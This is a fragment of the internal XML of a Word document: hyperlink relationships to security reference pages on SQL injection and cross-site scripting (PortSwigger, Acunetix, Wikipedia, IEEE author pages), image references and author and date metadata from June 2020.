    <w:div w:id="207041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sql-injection" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/burp/application-security-testing/oast" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ieeexplore.ieee.org/author/37088228847"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swigger.net/web-security/sql-injection/blind" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/burp/vulnerability-scann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en.wikipedia.org/wiki/Cross-site_script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ortswigger.net/web-security/sql-injection/examining-the-database"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portswigger.net/web-security/sql-injection" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/sql-injection/union-attacks" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.acunetix.com/websitesecurity/cross-site-scripting/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/sql-injection" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.acunetix.com/blog/articles/injection-attacks/" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ieeexplore.ieee.org/author/37086953379" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/SQL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16</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Gulwane</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Sanju</cp:lastModifiedBy>
  <cp:revision>24</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-06-04T09:47:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-06-04T14:08:00Z</dcterms:modified>
</cp:coreProperties>
</file>